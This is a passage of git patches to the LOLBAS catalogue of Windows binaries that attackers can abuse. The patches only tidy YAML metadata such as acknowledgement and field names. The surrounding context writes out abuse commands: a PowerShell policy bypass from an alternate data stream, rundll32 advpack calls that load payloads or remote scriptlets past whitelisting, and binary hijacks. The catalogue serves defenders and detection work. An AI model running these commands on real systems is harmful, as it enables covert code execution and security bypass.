4 +++- yml/LOLUtilz/OtherBinaries/Nvudisp.yml | 5 ++++- yml/LOLUtilz/OtherBinaries/Nvuhda6.yml | 4 +++- yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Setup.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Usbinst.yml | 4 +++- yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml | 4 +++- yml/LOLUtilz/OtherScripts/Testxlst.yml | 4 +++- yml/OSLibraries/Advpack.yml | 2 +- yml/OtherMSBinaries/Cdb.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 2 +- 22 files changed, 51 insertions(+), 26 deletions(-) diff --git a/YML-Template.yml b/YML-Template.yml index 5b3b17a..44c0e0b 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -34,7 +34,7 @@ Resources: - Link: Threatintelreport... Acknowledgement: - Person: John Doe - Handle: @johndoe + Handle: '@johndoe' - Person: Ola Norman - Handle: @olaNor + Handle: '@olaNor' --- diff --git a/yml/LOLUtilz/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml index cdb2ddd..bcd987d 100644 --- a/yml/LOLUtilz/OSBinaries/Explorer.yml +++ b/yml/LOLUtilz/OSBinaries/Explorer.yml @@ -14,5 +14,7 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/bohops/status/986984122563391488 -Notes: Thanks to Jimmy - @bohops +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/LOLUtilz/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml index d6fd688..7e4ce80 100644 --- a/yml/LOLUtilz/OSBinaries/Netsh.yml +++ b/yml/LOLUtilz/OSBinaries/Netsh.yml @@ -22,5 +22,3 @@ Resources: - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md - https://attack.mitre.org/wiki/Technique/T1128 - https://twitter.com/teemuluotio/status/990532938952527873 -Notes: '' - diff --git a/yml/LOLUtilz/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml index 390bc03..4288719 100644 --- a/yml/LOLUtilz/OSBinaries/Nltest.yml +++ b/yml/LOLUtilz/OSBinaries/Nltest.yml @@ -14,4 +14,6 @@ Detection: [] Resources: - https://twitter.com/sysopfb/status/986799053668139009 - https://ss64.com/nt/nltest.html -Notes: Thanks to Sysopfb - @sysopfb +Acknowledgement: + - Person: Sysopfb + Handle: '@sysopfb' diff --git a/yml/LOLUtilz/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml index 829f41a..656dc31 100644 --- a/yml/LOLUtilz/OSBinaries/Openwith.yml +++ b/yml/LOLUtilz/OSBinaries/Openwith.yml @@ -16,5 +16,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/harr0ey/status/991670870384021504 -Notes: Thanks to Matt harr0ey - @harr0ey - +Acknowledgement: + - Person: Matt harr0ey + Handle: '@harr0ey' diff --git a/yml/LOLUtilz/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml index eac5ec1..dfcc47b 100644 --- a/yml/LOLUtilz/OSBinaries/Powershell.yml +++ b/yml/LOLUtilz/OSBinaries/Powershell.yml @@ -14,5 +14,7 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/Moriarty_Meng/status/984380793383370752 -Notes: Thanks to Moriarty - @Moriarty_Meng +Acknowledgement: + - Person: Moriarty + Handle: '@Moriarty_Meng' diff --git a/yml/LOLUtilz/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml index bf0c3a2..eeafb02 100644 --- a/yml/LOLUtilz/OSBinaries/Psr.yml +++ b/yml/LOLUtilz/OSBinaries/Psr.yml @@ -18,5 +18,4 @@ Code_Sample: [] Detection: [] Resources: - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf -Notes: 'Thanks to ' diff --git a/yml/LOLUtilz/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml index a4bc42d..a14102d 100644 --- a/yml/LOLUtilz/OSBinaries/Robocopy.yml +++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml @@ -16,5 +16,3 @@ Code_Sample: [] Detection: [] Resources: - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx -Notes: Thanks to Name of guy - @twitterhandle - diff --git a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml index 0a2b30e..81af1bd 100644 --- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml +++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997997818362155008 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml index ce35964..a704097 100644 --- a/yml/LOLUtilz/OtherBinaries/Gpup.yml +++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997892519827558400 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml index a66bdba..0e9615e 100644 --- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml +++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml @@ -14,4 +14,6 @@ Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 -Notes: Thanks to Daniel Bohannon - @danielhbohannon +Acknowledgement: + - Person: Daniel Bohannon + Handle: '@danielhbohannon' diff --git a/yml/LOLUtilz/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml index 79d3bab..479ae55 100644 --- a/yml/LOLUtilz/OtherBinaries/Notes.yml +++ b/yml/LOLUtilz/OtherBinaries/Notes.yml @@ -14,4 +14,6 @@ Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 -Notes: Thanks to Daniel Bohannon - @danielhbohannon +Acknowledgement: + - Person: Daniel Bohannon + Handle: '@danielhbohannon' diff --git a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml index b421a69..d0d439d 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -23,4 +23,7 @@ Code_Sample: [] Detection: [] Resources: - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' + diff --git a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml index c6cdbeb..f7961f8 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml @@ -23,4 +23,6 @@ Code_Sample: [] Detection: [] Resources: - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ -Notes: Thanks to Adam - @hexacorn +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' diff --git a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml index 50e4bfb..f5cf18d 100644 --- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml +++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994213164484001793 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml index d777ed7..0dac609 100644 --- a/yml/LOLUtilz/OtherBinaries/Setup.yml +++ b/yml/LOLUtilz/OtherBinaries/Setup.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994381620588236800 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml index abcd144..4c31160 100644 --- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml +++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993514357807108096 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml index 3702e0f..593dea1 100644 --- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml +++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993497996179492864 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherScripts/Testxlst.yml b/yml/LOLUtilz/OtherScripts/Testxlst.yml index 05eb340..029eee3 100644 --- a/yml/LOLUtilz/OtherScripts/Testxlst.yml +++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml @@ -25,4 +25,6 @@ Detection: [] Resources: - https://twitter.com/bohops/status/993314069116485632 - https://github.com/mhammond/pywin32 -Notes: Thanks to Jimmy - @bohops +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 7d61259..cca0d1b 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -55,7 +55,7 @@ Resources: - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - Link: https://twitter.com/bohops/status/974497123101179904 - Link: https://twitter.com/moriarty_meng/status/977848311603380224 -Acknowledegment: +Acknowledgement: - Person: Jimmy (LaunchINFSection) Handle: '@bohops' - Person: Fabrizio (RegisterOCX - DLL) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 0183c57..db03291 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -23,7 +23,7 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda -Acknoledgement: +Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' --- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index e0c4fc2..700bc28 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -29,7 +29,7 @@ Detection: Resources: - Link: https://twitter.com/subTee/status/793151392185589760 - Link: https://attack.mitre.org/wiki/Execution -Acknowledgment: +Acknowledgement: - Person: Casey Smith Handle: '@subTee' --- From fc223eb3d88dcfbd1e9857a619279e93121a2052 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:48:20 +0000 Subject: [PATCH 05/19] Remove/fix unnecessary Categories field --- yml/LOLUtilz/OSBinaries/Explorer.yml | 1 - yml/LOLUtilz/OSBinaries/Netsh.yml | 1 - yml/LOLUtilz/OSBinaries/Nltest.yml | 1 - yml/LOLUtilz/OSBinaries/Openwith.yml | 1 - yml/LOLUtilz/OSBinaries/Powershell.yml | 1 - yml/LOLUtilz/OSBinaries/Psr.yml | 1 - yml/LOLUtilz/OSBinaries/Robocopy.yml | 1 - yml/LOLUtilz/OtherBinaries/AcroRd32.yml | 1 - yml/LOLUtilz/OtherBinaries/Gpup.yml | 1 - yml/LOLUtilz/OtherBinaries/Nlnotes.yml | 1 - yml/LOLUtilz/OtherBinaries/Notes.yml | 1 - yml/LOLUtilz/OtherBinaries/Nvudisp.yml | 1 - yml/LOLUtilz/OtherBinaries/Nvuhda6.yml | 1 - yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml | 1 - yml/LOLUtilz/OtherBinaries/Setup.yml | 1 - yml/LOLUtilz/OtherBinaries/Usbinst.yml | 1 - yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml | 1 - yml/LOLUtilz/OtherScripts/Testxlst.yml | 4 ++-- 18 files changed, 2 insertions(+), 19 deletions(-) diff --git a/yml/LOLUtilz/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml index bcd987d..362816d 100644 --- a/yml/LOLUtilz/OSBinaries/Explorer.yml +++ b/yml/LOLUtilz/OSBinaries/Explorer.yml @@ -3,7 +3,6 @@ Name: Explorer.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: explorer.exe calc.exe Description: 'Executes calc.exe as a subprocess of explorer.exe.' diff --git a/yml/LOLUtilz/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml index 7e4ce80..bb00211 100644 --- a/yml/LOLUtilz/OSBinaries/Netsh.yml +++ b/yml/LOLUtilz/OSBinaries/Netsh.yml @@ -3,7 +3,6 @@ Name: Netsh.exe Description: Execute, Surveillance Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: | netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() diff --git a/yml/LOLUtilz/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml index 4288719..38b00df 100644 --- a/yml/LOLUtilz/OSBinaries/Nltest.yml +++ b/yml/LOLUtilz/OSBinaries/Nltest.yml @@ -3,7 +3,6 @@ Name: Nltest.exe Description: Credentials Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: nltest.exe /SERVER:192.168.1.10 /QUERY Description: '' diff --git a/yml/LOLUtilz/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml index 656dc31..97600aa 100644 --- a/yml/LOLUtilz/OSBinaries/Openwith.yml +++ b/yml/LOLUtilz/OSBinaries/Openwith.yml @@ -3,7 +3,6 @@ Name: Openwith.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: OpenWith.exe /c C:\test.hta Description: Opens the target file with the default application. diff --git a/yml/LOLUtilz/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml index dfcc47b..da89149 100644 --- a/yml/LOLUtilz/OSBinaries/Powershell.yml +++ b/yml/LOLUtilz/OSBinaries/Powershell.yml @@ -3,7 +3,6 @@ Name: Powershell.exe Description: Execute, Read ADS Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: powershell -ep bypass - < c:\temp:ttt Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). diff --git a/yml/LOLUtilz/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml index eeafb02..7d529ed 100644 --- a/yml/LOLUtilz/OSBinaries/Psr.yml +++ b/yml/LOLUtilz/OSBinaries/Psr.yml @@ -3,7 +3,6 @@ Name: Psr.exe Description: Surveillance Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip Description: Capture screenshots of the desktop and save them in the target .ZIP file. diff --git a/yml/LOLUtilz/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml index a14102d..ceecc8b 100644 --- a/yml/LOLUtilz/OSBinaries/Robocopy.yml +++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml @@ -3,7 +3,6 @@ Name: Robocopy.exe Description: Copy Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Robocopy.exe C:\SourceFolder C:\DestFolder Description: Copy the entire contents of the SourceFolder to the DestFolder. diff --git a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml index 81af1bd..0e0b27f 100644 --- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml +++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml @@ -3,7 +3,6 @@ Name: AcroRd32.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe diff --git a/yml/LOLUtilz/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml index a704097..43332a2 100644 --- a/yml/LOLUtilz/OtherBinaries/Gpup.yml +++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml @@ -3,7 +3,6 @@ Name: Gpup.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe Description: Execute another command through gpup.exe (Notepad++ binary). diff --git a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml index 0e9615e..c33ccf4 100644 --- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml +++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml @@ -3,7 +3,6 @@ Name: Nlnotes.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. diff --git a/yml/LOLUtilz/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml index 479ae55..1b0bbab 100644 --- a/yml/LOLUtilz/OtherBinaries/Notes.yml +++ b/yml/LOLUtilz/OtherBinaries/Notes.yml @@ -3,7 +3,6 @@ Name: Notes.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. diff --git a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml index d0d439d..c3fdbcf 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -3,7 +3,6 @@ Name: Nvudisp.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Nvudisp.exe System calc.exe Description: Execute calc.exe as a subprocess. diff --git a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml index f7961f8..0d696a6 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml @@ -3,7 +3,6 @@ Name: Nvuhda6.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: nvuhda6.exe System calc.exe Description: Execute calc.exe as a subprocess. diff --git a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml index f5cf18d..8c97780 100644 --- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml +++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml @@ -3,7 +3,6 @@ Name: ROCCAT_Swarm.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe diff --git a/yml/LOLUtilz/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml index 0dac609..8c775f1 100644 --- a/yml/LOLUtilz/OtherBinaries/Setup.yml +++ b/yml/LOLUtilz/OtherBinaries/Setup.yml @@ -3,7 +3,6 @@ Name: Setup.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Run Setup.exe Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. diff --git a/yml/LOLUtilz/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml index 4c31160..3cfaf97 100644 --- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml +++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml @@ -3,7 +3,6 @@ Name: Usbinst.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" Description: Execute calc.exe through DefaultInstall Section Directive in INF file. diff --git a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml index 593dea1..f264cb8 100644 --- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml +++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml @@ -3,7 +3,6 @@ Name: VBoxDrvInst.exe Description: Persistence Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe diff --git a/yml/LOLUtilz/OtherScripts/Testxlst.yml b/yml/LOLUtilz/OtherScripts/Testxlst.yml index 029eee3..2fa25ed 100644 --- a/yml/LOLUtilz/OtherScripts/Testxlst.yml +++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml @@ -6,14 +6,14 @@ Created: 2018-05-25 Commands: - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). - Categories: Execution + Category: Execution Privileges: User MitreID: T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064 OperatingSystem: Windows - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). - Categories: Execution + Category: Execution Privileges: User MitreID: T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064 From 5012f9515221c2e99d50a98685461b2a7fd524b9 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:49:30 +0000 Subject: [PATCH 06/19] Fix Code_Sample field --- yml/OSBinaries/Eventvwr.yml | 2 +- yml/OSBinaries/Wsreset.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index ead74be..e19150e 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe -Code Sample: +Code_Sample: - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Detection: - IOC: eventvwr.exe launching child process other than mmc.exe diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 84edaf6..9c00099 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\wsreset.exe -Code Sample: +Code_Sample: - Code: Detection: - IOC: wsreset.exe launching child process other than mmc.exe From 2e08819eef2763cc703d61b1aad0945fd090d16a Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:54:00 +0000 Subject: [PATCH 07/19] Fix Usecase field --- yml/OSLibraries/Advpack.yml | 10 +++++----- yml/OSLibraries/Ieadvpack.yml | 10 +++++----- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 2 +- yml/OSLibraries/Setupapi.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 6 +++--- yml/OSLibraries/Syssetup.yml | 4 ++-- yml/OSLibraries/Url.yml | 12 ++++++------ yml/OSLibraries/Zipfldr.yml | 4 ++-- 11 files changed, 29 insertions(+), 29 deletions(-) diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index cca0d1b..56fe679 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. + Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1085 @@ -30,14 +30,14 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index ef48be6..e5a1c05 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. + Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1085 @@ -30,14 +30,14 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 19832be..c2996d4 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User 